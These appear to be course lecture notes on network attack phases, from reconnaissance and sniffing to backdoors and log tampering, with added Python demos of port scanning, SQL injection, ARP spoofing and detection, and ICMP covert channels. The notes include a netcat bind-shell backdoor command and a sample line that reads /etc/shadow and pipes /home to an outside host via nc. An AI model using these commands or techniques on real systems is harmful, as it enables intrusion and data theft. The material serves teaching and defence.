COEN 252

Security Threats

  • Untargeted attacks
    • Motivation is
      • Fun (I can do it)
        • prevalent until ~2000
      • Financial Gain
        • Selling access to compute resources
          • Creation of botnets for spamming, computation (distributed decryption, phishing, pharming …)
        • Selling data
          • Credit Card Information
          • E-mails
        • Targeted Denial of Service Attacks
          • Cloud Nine, a British ISP failed after suffering attacks
      • Cyber-warfare, terrorism
  • Targeted Attacks
    • Theft of information
    • Incapacitation of an organization to fulfill its purpose by destroying / impeding its use of computing resources

Phases of a Targeted Attack

  • Reconnaissance
  • Scanning
  • Gaining Access
  • Expanding Access
  • Covering Tracks

Reconnaissance

  • Social Engineering
    • Incite a human to act imprudently, furthering the goals of the attacker:
      • “I cannot access my email. What do I do?”
      • Countermeasures:
        • Identify security issues
        • Develop policies
          • Need to prevent leakage of information
          • Need buy-in by users and agents
          • Need to maintain user-friendliness of IT
  • Physical Reconnaissance
    • Dumpster Diving
      • Especially bountiful when people move
    • Installation of scanning devices
  • Finding publicly available information
    • Contact information of internet registration
      • WhoIs, ARIN, RIPE, …
    • Internal documents made publicly available:
      • Use search engines
      • Check Internet Archive, …
      • Identify naming conventions and guess file names
      • Scrutinize publications
        • A Word document may carry its revision history, including old versions of the text
        • A PDF had confidential text "redacted" by drawing a black box over it, which could simply be removed
    • Email, Usenet, Blog postings that identify names of internal machines, …
Reconnaissance: Scanning

Once we have a target, we need to get to know it better.


  • War Dialing (to find dial-in modems)
  • War Driving (to find wireless access points)
  • Network Mapping
    • Largely obsolete from the outside due to better firewall rules
  • Vulnerability Scanning
Scanning: War Dialing

Purpose: Find a modem connection.

  • Many users in a company install remote-control software such as pcAnywhere on their desktop PC without configuring it securely (no password, or a default one).
  • A war dialer finds these numbers by going through a range of phone numbers and listening for a modem's answer tone.
  • A demon dialer tries a brute-force password attack on a found connection.
  • Typically, a war-dialing sweep of a large organization will find at least one unsecured connection.
Scanning: Network Mapping

ping

  • ping is implemented using the Internet Control Message Protocol (ICMP) Echo Request.
  • A receiving station answers the sender with an ICMP Echo Reply.
  • Used by system administrators to check the status of machines and connections.
Scanning: Network Mapping

traceroute

  • Sends packets (ICMP echo requests on Windows, UDP probes on most Unix versions) with increasing time-to-live (TTL) values (= number of hops allowed).
  • A router that receives a packet whose TTL has run out discards it and sends an ICMP Time Exceeded message back to the sender.
  • Traceroute collects these messages, one router per TTL value, to find the route to a given system.
  • Useful for system administration.
Scanning: Network Mapping

Cheops

  • UNIX-based network scanner.
  • Uses traceroute and other tools to map a network.
  • Cheops et Co. are the reason that firewalls intercept pings.

Reconnaissance: Port Scans
  • Applications on a system use ports to listen for network traffic or send it out.
  • 2^16 = 65,536 ports per transport protocol (TCP, UDP), some reserved for well-known services such as http (80), ftp (21), ...
  • Port scans send various types of packets (TCP, UDP, ICMP) to the target on different ports.
  • The reaction tells the scanner whether the port is open (an application listens), closed (no listener; the host answers with a TCP RST or ICMP port unreachable) or filtered (no answer; a firewall drops the probe).
Reconnaissance: Nmap
  • Uses different types of packets to check for open ports.
    • SYN (half-open), TCP connect, Xmas tree, NULL, FIN, UDP, … scans
  • Can often tell from idiosyncrasies in the responses which OS is running (OS fingerprinting), frequently down to the version and sometimes the patch level.
  • Can scan more quietly (half-open scans, slow timing, decoy source addresses) so that many firewalls and simple intrusion detection systems do not flag it.
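A minimal scanner showing the open / closed / filtered distinction the two slides above describe, as an added example that is not part of the COEN 252 deck or of nmap. It does TCP connect() probes (what nmap calls -sT) against a constructed local listener, so it runs offline; start_listener, pick_closed_port and the port list are assumptions made for the demonstration.

```python
"""TCP connect() port scan with open / closed / filtered classification.
Added example for the port-scan and nmap slides; not code from the COEN 252 deck.
The target is a constructed local listener so the scan runs offline."""
import errno
import socket


def start_listener(host="127.0.0.1"):
    """Constructed target: a TCP socket listening on an ephemeral port.
    The kernel completes handshakes from the backlog, so no accept() loop is needed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def pick_closed_port(host="127.0.0.1"):
    """Bind and immediately release an ephemeral port so the scan has a known-closed target."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def probe_port(host, port, timeout=0.5):
    """Full three-way-handshake probe (nmap -sT). The target's reaction is the result:
    SYN/ACK -> open, RST -> closed, silence -> filtered (a firewall dropped the SYN)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError as e:
        # No route / host unreachable carries the same information as a dropped SYN
        if e.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH):
            return "filtered"
        return "error"
    finally:
        s.close()


def service_name(port):
    """Well-known service for a port from the local services table ('http' for 80), or None."""
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return None


def scan(host, ports, timeout=0.5):
    """Scan a list of ports; returns {port: state}."""
    return {p: probe_port(host, p, timeout) for p in ports}


if __name__ == "__main__":
    srv, open_port = start_listener()
    closed_port = pick_closed_port()
    try:
        for port, state in scan("127.0.0.1", [open_port, closed_port, 80]).items():
            print(f"{port:5d}/tcp  {state:8s}  {service_name(port) or '?'}")
    finally:
        srv.close()
```

A connect() scan completes the handshake, so the target application logs a connection; nmap's default SYN scan tears the connection down after the SYN/ACK, which is what the "stealth" on the slide refers to, and needs raw sockets that this example avoids.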
Reconnaissance Prevention
  • Firewalls can make it very difficult to scan from the outside.
    • Drop scan packets (e.g. unsolicited SYNs to closed ports) instead of answering them.
  • Hardened TCP/IP stacks and patched OSs show fewer of the idiosyncrasies that allow OS determination.
  • An IDS can detect internal scans and warn against them.
  • Example: Detect and block traceroute by not allowing in packets with very small TTL values.
Gaining Access
  • Fault in Policy
    • Weak or no authentication, unwarranted trust relationships, …
  • Fault in Implementation
    • Typically triggered by intentionally malformed input
  • Extension of a security breach
    • Sniffing, malware, …
Security Policy, Software defects, flaws, vulnerabilities
  • A Security Policy is a set of rules and practices that specify or regulate how a system or organization provides security services to protect sensitive and critical system resources [Internet Society 00].
  • Software Defects:
    • A software defect is the encoding of a human error into the software, including omissions.
  • Security Flaw:
    • A security flaw is a software defect that poses a potential security risk.
    • Eliminating software defects eliminates security flaws.
  • Vulnerability
    • set of conditions that allows an attacker to violate an explicit or implicit security policy.
    • Not all security flaws lead to vulnerabilities.
    • Not all vulnerabilities are based on a security flaw.
Software Vulnerabilities
  • To trigger a vulnerability, the attacker needs
    • to control the environment of the application (environment variables, files, network responses, …)
    • or to craft input.

Software Vulnerabilities
  • In a typical environment, an attacker who can write a single value to a single address of their choosing (a "write-what-where" primitive) can execute arbitrary code.
  • Typical Targets
    • Global Offset Table (GOT) in Unix
      • Used to link to library functions
    • .dtors
      • Used by gcc to link to destructors that run at termination of the program
    • Virtual Function Tables
    • Structured Exception Handling (SEH) records in Windows
Software Vulnerabilities
  • Typical Vulnerabilities
    • Buffer Overruns:
      • Input string is stored in a buffer, but the buffer is too small
      • Input that did not fit in the buffer has overwritten adjacent data
      • Stack-based buffer overflow: Overwrite the return address of a function
    • Format String Vulnerability: (specific to C)
      • Arises when user input is passed as the format string, e.g. printf(buf) instead of printf("%s", buf)
      • The %n conversion writes the number of bytes printed so far to a pointer taken from the stack, so an attacker who controls the format string can write to an address of their choosing
    • Integer Overflow
      • E.g. a length computation wraps around and a later allocation or bounds check uses the wrong size
    • Race Conditions
      • Especially when accessing files (time-of-check to time-of-use)
Software Vulnerabilities
  • Typical Vulnerabilities
    • Injection Attacks
      • Input (e.g. user input to a web server) is used to build the arguments of a command to be executed: Command Injection
      • Input (e.g. user input to a web server) is used to build an SQL query to be executed and its result displayed: SQL Injection
    • Name Resolution Attacks
      • Different modules use different ways to canonicalize / resolve names of resources such as files
        • HFS+ file names are not case sensitive, but Apache's access rules are, so /Private/ is not matched by a rule written for /private/
        • Homoglyphs (e.g. Cyrillic о vs. Latin o look identical but are different names)
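Added example (not from the deck) putting both items of this list in code: a login query that is injectable beside its parameterised form, and a path rule applied to the request path before and after canonicalisation. The user table, the /protected/ rule and the one-entry CONFUSABLES map are assumptions for the demonstration.

```python
"""Injection and name-resolution flaws from the list above, as an added example
(not code from the COEN 252 deck). Uses an in-memory SQLite database and a
hypothetical /protected/ access rule; the Cyrillic-o mapping is a one-entry
stand-in for a real confusables table."""
import posixpath
import sqlite3
import unicodedata


def make_db():
    """Constructed user table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn, user, pw):
    """User input is pasted into the SQL text, so it can rewrite the query.
    pw = "' OR '1'='1" turns the WHERE clause into (... AND pw='') OR '1'='1'."""
    q = f"SELECT name FROM users WHERE name = '{user}' AND pw = '{pw}'"
    return conn.execute(q).fetchone() is not None


def login_safe(conn, user, pw):
    """Parameterised query: the driver passes user input as data, never as SQL."""
    q = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return conn.execute(q, (user, pw)).fetchone() is not None


CONFUSABLES = {"\u043e": "o"}  # Cyrillic small letter o -> Latin o (hypothetical, one entry)


def canonical_path(url_path):
    """Resolve a request path the way the file system will before checking it:
    Unicode compatibility normalisation, confusable folding, ../ collapsing and,
    for a case-insensitive file system such as HFS+, case folding."""
    p = unicodedata.normalize("NFKC", url_path)
    p = "".join(CONFUSABLES.get(ch, ch) for ch in p)
    p = posixpath.normpath(p)
    return p.lower()


def is_protected_naive(url_path):
    """Apache-style case-sensitive, literal rule: deny anything under /protected/."""
    return url_path.startswith("/protected/")


def is_protected(url_path):
    """Same rule applied to the canonical form, so case, ../ and look-alike
    characters cannot route around it."""
    return canonical_path(url_path).startswith("/protected/")


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login:", login_vulnerable(conn, "alice", "' OR '1'='1"))  # True: bypassed
    print("safe login:      ", login_safe(conn, "alice", "' OR '1'='1"))        # False
    for req in ("/Protected/x.txt", "/public/../protected/x.txt",
                "/pr\u043etected/x.txt", "/public/readme.txt"):
        print(f"{req!r:32} naive={is_protected_naive(req)!s:5} canonical={is_protected(req)}")
```

The check-then-use rule is the same in both halves: the component that enforces a rule must see exactly the name or query the component that acts on it will see, which means canonicalising first and never building the executed text out of untrusted input.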
Software Vulnerabilities
  • Use of magic names
    • Instance of security by obscurity
      • Magic URL
      • Hidden Form Fields
Software Vulnerabilities
  • Wrong amount of security information results in poor usability
    • Too many warnings: Users are confused and trained to ignore warnings
    • Too few warnings: Users are not made aware of risks
  • Bad networking protocols
    • Unauthenticated key exchange
    • Trusting network name resolution
Gaining Access through Network Attacks: Sniffing
  • Sniffer: Gathers traffic from a LAN by putting the network interface into promiscuous mode.
  • Examples: Snort, Sniffit
  • On a switched LAN, packets for other hosts do not reach the attacker's port; use spoofed ARP (Address Resolution Protocol) replies to reroute traffic.
Gaining Access through Network Attacks: Sniffing
  • Sniffing through a switch:
    • MAC flooding:
      • A switch learns which MAC address sits behind which port from the source addresses of the frames it sees and stores them in its CAM table.
      • Switches accept these source addresses without any authentication.
      • The attacker sends a flood of frames with random source MAC addresses.
      • The switch's table fills up.
      • The switch falls back to flooding frames out of every port, i.e. it behaves like a hub, and the attacker's sniffer sees all traffic.
    • Spoofed ARP messages
Gaining Access through Network Attacks: Sniffing
  • Sniffing through a switch:
    • Spoofed ARP messages:
      • ARP resolves IP addresses to MAC addresses; replies are neither authenticated nor checked against an outstanding request.
      • Step 1: Attacker sets up IP forwarding to the default router on the LAN.
      • Step 2: Send a faked ARP reply to the victim's machine, mapping the default router's IP to the attacker's MAC address.
      • Step 3: Victim sends out a message to the outside world. It is addressed to the default router's IP, i.e. delivered to the attacker's machine.
      • Step 4: Attacker reads the traffic.
      • Step 5: Because of forwarding, the packet is passed on to the actual default router, so the victim notices nothing.
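The forged reply from Step 2 as bytes, beside the passive check a defender can run against it (the approach of arpwatch), as an added example that is not code from the deck. Frames are only built and parsed here, nothing is sent; all MAC and IP addresses are constructed.

```python
"""Spoofed ARP reply (Step 2 above) and an arpwatch-style detector.
Added example, not code from the COEN 252 deck; frames are built and parsed as
bytes only, nothing is sent. All MAC and IP addresses are constructed."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(s):
    return bytes(int(o) for o in s.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet (RFC 826 layout)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # Ethernet, IPv4, hlen, plen, opcode
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not ARP over Ethernet/IPv4."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}


def spoofed_gateway_reply(attacker_mac, gateway_ip, victim_mac, victim_ip):
    """Step 2 of the attack: an unsolicited reply telling the victim that the
    gateway's IP now lives at the attacker's MAC. ARP has no authentication, so
    the victim's cache simply overwrites the old entry."""
    return build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)


class ArpWatcher:
    """Passive detector: remembers the MAC last seen for each IP and alerts when
    it changes. observe() returns an alert string or None."""

    def __init__(self):
        self.table = {}

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None:
            return None
        ip, mac = a["sender_ip"], a["sender_mac"]
        old = self.table.get(ip)
        self.table[ip] = mac
        if old is not None and old != mac:
            return f"ALERT {ip}: {old} -> {mac} (possible ARP spoofing)"
        return None


# Constructed LAN: gateway, victim and attacker
GATEWAY_MAC, GATEWAY_IP = "00:11:22:33:44:55", "192.168.1.1"
VICTIM_MAC, VICTIM_IP = "66:77:88:99:aa:bb", "192.168.1.10"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def demo():
    """A legitimate reply from the gateway, then the attacker's forged one."""
    w = ArpWatcher()
    legit = build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    forged = spoofed_gateway_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    return [w.observe(legit), w.observe(forged)]


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The watcher only sees the conflict if it runs on a port that receives the forged reply (a mirror port, or the victim itself); the real countermeasures are static ARP entries for the gateway and dynamic ARP inspection on the switch.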
Gaining Access through Network Attacks: Sniffing
  • Man-in-the-Middle attack with dsniff:
    • Step 1: Send a fake DNS response to the victim (dsniff's dnsspoof) that resolves the name of the web site to be attacked to the attacker's IP address.
    • Step 2: Victim connects to the web site.
    • Step 3: The name resolves to the attacker's machine, so the request is sent there.
    • Step 4: Attacker's site receives the request, acts as a proxy and forwards it to the real web site.
    • Step 5: Real web site answers, attacker's site forwards the answer to the victim, reading or altering everything in between.
Gaining Access: Session Hijacking
  • IP Address Spoofing: Send out IP packets with false source addresses.
  • If an attacker sits on a link through which traffic between two sites flows, the attacker can observe the sequence numbers and inject spoofed packets to "hijack the session".
  • Attacker inserts commands into the connection.
  • Details omitted.
Exploiting and Maintaining Access

After successful intrusion, an attacker should:

  • Attack privileged programs to gain root or administrator privileges.
  • Erase traces (e.g. change log entries).
  • Take measures to maintain access.
  • Erase security holes so that no-one else can gain illicit access and do something stupid to wake up the sys. ad.
Maintaining Access: Trojans
  • A program with an additional, evil payload.
    • Running MS Word also reinstalls a backdoor.
    • ps does not display the installed sniffer.
Maintaining Access: Backdoors
  • Bypass normal security measures.

Example: netcat

  • Install netcat on the victim, compiled with the GAPING_SECURITY_HOLE option (which enables -e), and leave it listening:

nc -l -p 12345 -e cmd.exe

  • -l listen, -p 12345 on that port, -e hand each incoming connection to the named program (cmd.exe here on Windows, /bin/sh on Unix).
  • In the future: connect to port 12345 and start typing commands.
Maintaining Access: Backdoors
  • BO2K (Back Orifice 2000) runs in stealth mode (you cannot discover it by looking at the Processes tab in the Task Manager).
  • Otherwise, it is a remote control program like pcAnyWhere, that allows accessing a computer over the net.
Maintaining Access: Backdoors
  • RootKit:

A backdoor built as a Trojan of system executables such as ps, ls, netstat or ifconfig, so that the very tools an administrator would use to look for the intruder lie about processes, files and connections.

  • Kernel-Level RootKit:

Changes the OS, not only system executables.

Covering Tracks
  • Altering logs.
  • Create difficult to find files and directories.
  • Covert Channels through Networks:
    • Loki uses ICMP messages as the carrier.
    • Use WWW traffic.
    • Use unused fields in TCP/IP headers.
  • Use antiforensics
    • Change registry values to delete traces of installed programs
    • Change Date-Time stamps
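The Loki item above, as an added example (not the deck's or Loki's code): data chunked into the payload of ICMP Echo Requests with valid checksums, the receiver that reassembles it, and a detector heuristic. Packets are built and parsed as bytes only, so it runs without raw sockets; the "normal ping payload" patterns in looks_like_normal_ping and the entropy threshold are assumptions.

```python
"""Loki-style covert channel: data carried in the payload of ICMP Echo Requests,
plus a simple detector. Added example, not code from the COEN 252 deck or Loki;
packets are built and parsed as bytes only, nothing is sent (raw sockets need root).
The patterns in looks_like_normal_ping are an assumption about common ping payloads."""
import math
import struct

ICMP_ECHO_REQUEST = 8


def icmp_checksum(data):
    """RFC 1071 ones'-complement sum over 16-bit words (odd length padded with a zero byte)."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def build_echo(ident, seq, payload):
    """ICMP header (type, code, checksum, identifier, sequence) followed by any payload."""
    hdr = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(hdr + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(pkt):
    """Validate the checksum and split a packet into (type, identifier, sequence, payload)."""
    if len(pkt) < 8 or icmp_checksum(pkt) != 0:
        raise ValueError("bad ICMP packet")
    typ, _code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return typ, ident, seq, pkt[8:]


def encode_covert(data, ident, chunk=32):
    """Sender side: one echo request per chunk; the sequence number orders the
    chunks and the identifier marks them as ours."""
    n = (len(data) + chunk - 1) // chunk
    return [build_echo(ident, i, data[i * chunk:(i + 1) * chunk]) for i in range(n)]


def decode_covert(pkts, ident):
    """Receiver side: keep echo requests with our identifier, reassemble by sequence number."""
    parts = {}
    for p in pkts:
        typ, i, seq, payload = parse_echo(p)
        if typ == ICMP_ECHO_REQUEST and i == ident:
            parts[seq] = payload
    return b"".join(parts[k] for k in sorted(parts))


WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def payload_entropy(b):
    """Shannon entropy in bits per byte."""
    if not b:
        return 0.0
    counts = {}
    for x in b:
        counts[x] = counts.get(x, 0) + 1
    return -sum(c / len(b) * math.log2(c / len(b)) for c in counts.values())


def looks_like_normal_ping(payload):
    """Assumption: stock ping payloads are either the Windows alphabet string or
    (Linux/BSD) an 8-byte timestamp followed by the bytes 0x10, 0x11, 0x12, ..."""
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    body = payload[8:]
    return 0 < len(body) <= 240 and body == bytes(range(0x10, 0x10 + len(body)))


def suspicious(pkt):
    """Flag echo requests whose payload is neither a known ping pattern nor low-entropy."""
    typ, _i, _s, payload = parse_echo(pkt)
    return typ == ICMP_ECHO_REQUEST and not looks_like_normal_ping(payload) and payload_entropy(payload) > 2.5


if __name__ == "__main__":
    secret = b"cat /etc/shadow; tar czf - /home | nc 203.0.113.5 53\n"  # constructed
    pkts = encode_covert(secret, ident=0x4C4B)
    print(len(pkts), "packets,", [suspicious(p) for p in pkts])
    print(decode_covert(pkts, 0x4C4B) == secret)
```

The short final chunk shows the limit of the entropy heuristic: a few bytes of text score low and pass, which is why a defender usually blocks or rate-limits ICMP echo across the perimeter rather than trying to recognise the contents.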
Hacker Profile
  • Internal Hacker
    • Disgruntled employee
    • Contracted employee
      • Targets for corporate espionage.
      • Are not bound by employee policies and procedures.
    • Indirectly contracted employee
      • Perform shared or subcontracted services
Hacker Profile
  • External Hacker
    • Recreational Hacker
      • 85 to 90% male.
      • Between 12 and 25.
      • Highly intelligent low-achiever.
      • Typically from dysfunctional families.
    • Professional Hacker
      • Hackers for hire.
      • Electronic warfare, corporate espionage.
      • So-called “Security Consultants” who look for blackmail or exploit for hire
      • Security Consultants
Hacker Profile
  • Virus writers [1]
    • Teenagers, College Students, Professionals
    • Drop out of the scene as adults or have social problems.
    • Intelligent, educated, male.

[1] Study by Sarah Gordon, IBM, in Beiser, Vince, "Inside the Virus Writer's Mind"

Hacker Profile
  • Script Kiddy
    • Uses scripts or programs written by others to exploit known vulnerabilities
    • Goal is bragging rights, defacing web sites
    • Sweep IP addresses for vulnerability
    • Typically not explicitly malicious, but can cause damage inadvertently
Hacker Profile
  • Dedicated Hacker
    • Does research.
    • Knows the ins and outs of the OS, the system, auditing and security tools.
    • Writes or modifies programs and shell scripts
    • Reads security bulletins (CERT, NIST)
    • Searches the underground.
Hacker Profile
  • Skilled Hacker
    • Thorough understanding of system at the level of Sys Ad or above.
    • Can read OS source code.
    • Understands network protocols.
  • Superhacker
    • Does not brag or post.
    • Can enter or bring down any system.

Hacker Motives
  • Intellectually Motivated
    • Educational experimentation
      • 28 year old computer expert diverted 2585 US West computers to search for a new prime number.
      • Used 10.63 years of computer time.
      • Lengthened telephone number lookup to 5 minutes
      • Almost shut down the Phoenix Service Delivery Center
    • “Harmless Fun”
      • Web defacing
    • Wake-up Call
      • Free-lance security consultant (still illegal)
Hacker Motives
  • Personally motivated
    • Disgruntled employee.
    • Cyber-stalking
      • E.g. to show off superiority to someone they feel / are inferior to.
      • Danger of escalation to physical attack.
        • A 50-year old security guard used the internet to solicit the rape of a 28-year old woman who rejected him.
        • Impersonated her in chat rooms and online bulletins.
        • Impersonated rape fantasies.
        • At least six men knocked at her door at night offering to rape her.
        • Six years in prison.
Hacker Motives
  • Socially motivated
    • Cyber-activism
    • Politically motivated
      • Hacking KKK or NAACP websites
    • Cyber-Terrorism
      • Threatens serious disruption of the infrastructure
        • Power
        • Water
        • Transportation
        • Communication
      • 1988: Israeli Virus and logic bomb in Israeli government computers
    • Cyber-warfare
Hacker Motives
  • Financially Motivated
    • Personal profit.
      • Two Cisco Systems accountants issued almost $8 M in Cisco stock to themselves.
      • Accessed a system used to manage stock option disbursals to find control numbers for forged authorization forms.
    • Damage to the organization.
      • British internet provider Cloud Nine went out of business after a crippling series of DoS attacks.
  • Ego Motivated
Hacking Damage
  • Releasing Information
  • Releasing Software
    • By circumventing copy protection.
    • Through IP theft
  • Consuming Unused(?) Resources
  • Discover and Document Vulnerabilities
  • Compromise Systems and Increase their Vulnerabilities
  • Website Vandalism